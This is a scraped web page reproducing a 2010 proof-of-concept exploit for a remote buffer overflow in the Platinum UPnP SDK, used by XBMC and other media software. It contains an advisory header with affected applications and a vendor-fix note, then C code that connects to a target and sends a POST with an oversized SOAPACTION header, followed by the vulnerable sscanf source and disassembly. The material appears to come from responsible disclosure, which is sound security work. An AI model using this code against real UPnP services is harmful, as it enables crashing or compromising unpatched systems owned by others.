扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 |
/* -POC CODE Remote Buffer Overflow - ========================================================================= ! Exploit Title: Platinum SDK library post upnp sscanf buffer overflow ! ========================================================================= Date: 28th October 2010 ----------------------- Author: n00bRealname: *carl cope* ----------------------------------- Software Link: http://www.plutinosoft.com/platinum -------------------------------------------------- Version: All versions are affected Mulitple vendors --------------------------------------------------- Tested on: Windows xp sp3,Vista sp2,Linux unbuntu --------------------------------------------------- Fixed versions :Platinum 0.6.0 ========================================================================== -Mulitple vendors soap_action_name post upnp sscanf remote buffer overflow- ========================================================================== -Description- First of all while i was testing the upnp in the xbmc application i noticed after finding the vulnerable function in the source code it was because of the Platinum UPnP SDK which was used for upnp protocol. There are more applications vulnerable to this exploit than i had first thought im not writing an exploit for them all as it would be pointless i've passed the information to the developers of platinum sdk and when they have updated so will the rest of the vendors hope fully. Any thing which uses this sdk is exploitable if you do decide to write an exploit for any of the vulnerable applications please give credits to n00b for finding the bug.!! The vendor has released a fix for this vulnerability http://kent.dl.sourceforge.net/project/platinum/platinum/0.6.1/CHANGELOG.txt I would like to thank the vendor of the sdk for taking swift action and fixing this vulnerability swiftly 10/10 for communications and working to get this issue resolved. -Description- Version 2010-07-27 Platinum-SRC-0-6-0_632 SDK This is a list of the applications that are using the platinum SDK library. -Afected applications- Asset UPnP= http://forum.dbpoweramp.com/showthread.php?t=18020 <-- Tested and is exploitable Release v.3. XBMC= http://xbmc.org/ <-- Tested and is exploitable/Exploit released. Google Simplify Media = http://www.simplifymedia.com/blog/ qvivo = http://www.qvivo.com/us/download/ doubletwist = http://www.doubletwist.com/ Boxee = http://www.boxee.tv/ BoxAmp= http://www.open7x0.org/wiki/BoxAmp Ventis Media= http://www.mediamonkey.com/ DVBSBridge= http://www.dvblogic.com/ IntelligentShare= http://www.adoubleu.de/ Easyon.tv = http://www.easyon.tv/index.php Foobar plugin foo_upnp= http://www.hydrogenaudio.org/forums/index.php?showtopic=69664 plex= http://elan.plexapp.com/ CommVault = http://www.commvault.com/ Iwedia= http://www.iwedia.com/ Mythtv= http://www.mythtv.org/wiki/UPnP Vdr-plugin-upnp = http://www.linuxtv.org/vdrwiki/index.php/Vdr-plugin-upnp Any thing that use this sdk is exploitable till the update is available. -Afected applications- -Shouts- Aluigi = Take care m8 and all the best for the future !!. Corelan= Keep up the good work thanks for the advice !!. Exploit-db = Looking good guys keep up the good work !!. XBMC-DEV = Nice work with the project looking nice !!. -Shouts- ---------- Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!! */ #include <stdio.h> #include <sys/socket.h> #include <arpa/inet.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> /* '''!!IMPORTATNT!! The UUID must be set i've hardcoded this to make it easy to replace with the victim UUID you can get the UUID number from the server by issuing a get request to the vulnerable server on port 00000 you can use a web browser to do this. example = http://127.0.0.1:00000 -Note- Just a side note the port is random and once the xbmc application is installed the UUID will be set up along with the port number at installation so you will have to do a port scan to find what port the service is running on but once its found it will be on that port till it is reinstalled.Also the UUID will stay the same. Universally Unique Identifier --------------------------------------------------- XML example <UDN> uuid:0970aa46-ee68-3174-d548-44b656447658 </UDN> --------------------------------------------------- -Note- I was not going to write an xml paraser just for this when a web browser and a set of eyes can do it.:) Platinum UPnP SDK <blockquote class="wp-embedded-content" data-secret="hQulk9tbxP"><a href="https://www.plutinosoft.com/" target="_blank"rel="external nofollow" class="external" >Platinum UPnP</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Platinum UPnP” — Plutinosoft" src="https://www.plutinosoft.com/embed/#?secret=dLOh7Y6JxN#?secret=hQulk9tbxP" data-secret="hQulk9tbxP" frameborder="0" marginmarginscrolling="no"></iframe> http://sourceforge.net/users/c0diq ''' */ //compiled using gcc on linux. //Cygwin on windows. void error(char *mess) { perror(mess); exit(1); } int main(int argc, char *argv[]) { int sock; int input; struct sockaddr_in http_client; char buf[2000]; unsigned int http_len; /* If there is more than 2 arguments passed print usage!!*/ if (argc != 3) { fprintf(stderr,"USAGE: Server_ip port\n"); exit(1); } /* Create socket */ if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { error("Cant create socket"); } /* Construct sockaddr */ memset(&http_client, 0, sizeof(http_client)); http_client.sin_family = AF_INET; http_client.sin_addr.s_addr = inet_addr(argv[1]); http_client.sin_port = htons(atoi(argv[2])); /* Establish connection */ if (connect(sock, (struct sockaddr *) &http_client, sizeof(http_client)) < 0) { error("Failed to connect with remote host"); } //Build the upnp equest memcpy(buf, "POST /AVTransport/ ", 18); memcpy(buf+18, "0970aa46-ee68-3174-d548-44b656447658", 36); //Replace with uuid of the vulnerable server # memcpy(buf+54, "/control.xml HTTP/1.1\r\n", 79); strcat(buf, "SOAPACTION: \x22urn:schemas-upnp-org:service:AVTransport:1#"); strcat(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAA\r\n" "CONTENT-TYPE:text/xml; charset=\x22utf-8\x22\r\n" "HOST: 192.168.1.2:26125\r\n" "Content-Length: 345"); /* Send our request to the server*/ http_len = strlen(buf); if (send(sock, buf, http_len, 0) != http_len) close(sock); exit(0); } /* -Vulnerable source code- This information was found using windows 7 + Visual c++ 2010 express. .\lib\libUPnP\Platinum\Source\Core\PltDeviceHost.cpp ---------------------------------------------------------------------- | PLT_DeviceHost::ProcessPostRequest +--------------------------------------------------------------------- NPT_Result PLT_DeviceHost::ProcessHttpPostRequest(NPT_HttpRequest&request, # const NPT_HttpRequestContext& context, # NPT_HttpResponse& response) { NPT_Resultres; NPT_Stringservice_type; NPT_Stringstr; NPT_XmlElementNode* xml = NULL; NPT_Stringsoap_action_header; PLT_Service*service; NPT_XmlElementNode* soap_body; NPT_XmlElementNode* soap_action; const NPT_String* attr; PLT_ActionDesc* action_desc; PLT_ActionReference action; NPT_MemoryStreamReference resp(new NPT_MemoryStream); NPT_Stringip_address= context.GetRemoteAddress().GetIpAddress().ToString(); NPT_Stringmethod= request.GetMethod(); NPT_Stringurl = request.GetUrl().ToRequestString(true); NPT_Stringprotocol= request.GetProtocol(); if (NPT_FAILED(FindServiceByControlURL(url, service, true))) goto bad_request; if (!request.GetHeaders().GetHeaderValue("SOAPAction")) goto bad_request; extract the soap action name from the header soap_action_header = *request.GetHeaders().GetHeaderValue("SOAPAction"); soap_action_header.TrimLeft('"'); soap_action_header.TrimRight('"'); char prefix[200]; char soap_action_name[100];<--- 100 bytes allocated for the soap action name. intret; //FIXME: no sscanf ret = sscanf(soap_action_header, "%[^#]#%s", <--- # prefix, <--- Bad very Bad. # soap_action_name);<--- if (ret != 2) # goto bad_request; // read the xml body and parse it if (NPT_FAILED(PLT_HttpHelper::ParseBody(request, xml))) <--- BOOOM I WIN!! # goto bad_request; Disassembly of vulnerable function.!! ================================== 025D2D23lea edx,[ebp-1F4h] 025D2D29pushedx 025D2D2Alea eax,[ebp-188h] 025D2D30pusheax 025D2D31push2F5E404h 025D2D36lea ecx,[ebp-44h] 025D2D39callNPT_String::operator char const * (1B1840Eh) 025D2D3Epusheax 025D2D3Fcall@ILT+120575(_sscanf) (1AF7704h) 025D2D44add esp,10h 025D2D47mov dword ptr [ebp-1FCh],eax */ |
体验盒子
